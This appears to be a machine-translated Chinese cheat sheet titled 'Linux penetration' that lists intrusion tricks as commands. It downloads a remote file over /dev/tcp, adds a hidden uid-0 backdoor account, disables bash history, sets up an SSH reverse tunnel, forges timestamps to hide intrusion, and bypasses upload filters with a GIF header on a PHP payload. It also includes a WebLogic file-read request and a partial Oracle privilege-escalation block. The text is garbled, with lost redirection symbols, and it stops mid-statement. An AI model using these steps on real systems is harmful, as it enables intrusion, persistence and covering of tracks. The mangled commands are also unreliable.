linux渗透（Linux渗透）.docVIP

linux渗透（Linux渗透） 1. download files without downloading tools such as WGet, NC, etc. Exec 5/dev/tcp//80 echo -e GET /c.pl HTTP/1.0\n 5 cat5 c.pl 2.Linux adds uid to 0 users Useradd -o -u 0 cnbird 3.bash removes the history record Export HISTSIZE=0 Export HISTFILE=/dev/null 4.SSH reverse link SSH -C -f -N -g -R 44::22 cnbird@ip -p specifies the remote server SSH port Then you can execute SSH localhost -p 44 on the server 5.weblogic local read file vulnerability Curl -H wl_request_type: wl_xml_entity_request -H xml-registryname:../../ -H xml-entity-path: config.xml http://server/wl_management_internal2/wl_management 6.apache looks at the virtual web directory ./httpd -t -D DUMP_VHOSTS 7.cvs penetration skills CVSROOT/passwd UNIX SHA1 password file CVSROOT/readers CVSROOT/writers CVS/Root |lt; br / CVS/Entries update file and directory contents CVS/Repository 8.Cpanel path leak /3rdparty/squirrelmail/functions/plugin.php 9. modify the upload time stamp (hide traces of intrusion) Touch -r old file timestamp, new file timestamp 10. use Baidu and Google to search target host webshell Intitle:PHPJackal 1t1t Total supplement of 11. packs Create a temporary hidden directory MKDIR /tmp/... /tmp/... The directory is hidden under the hangover of the administrator and can be temporarily placed on exp 12. use Linux output to bypass the GIF limit of the picture Printf GIF89a\x01\x00\x01\x00 poc.php 13. reading environment variables is very helpful in finding information /proc/self/environ 14., the latest ORACLE 11 raises user rights (as long as session permissions) IMPORT_JVM_PERMS in DBMS_JVM_EXP_PERMS Login permission Select * from session_privs; Create SESSION Select * from session_roles; Select, TYPE_NAME, NAME, ACTION, FROM, SYS.DBA_JAVA_POLICY, Where, GRANTEE = GREMLIN (user name); DESC JAVA$POLICY$ DECLARE POL DBMS_JVM_EXP.TEMP_JAVA_POLICY; CURSOR C1 IS (USER) Select GRANT, SYS, java.io.FilePermission , , execute , ENABLE FROM DUAL; BEGIN OPEN C1; FETCH, C1, BULK, COLL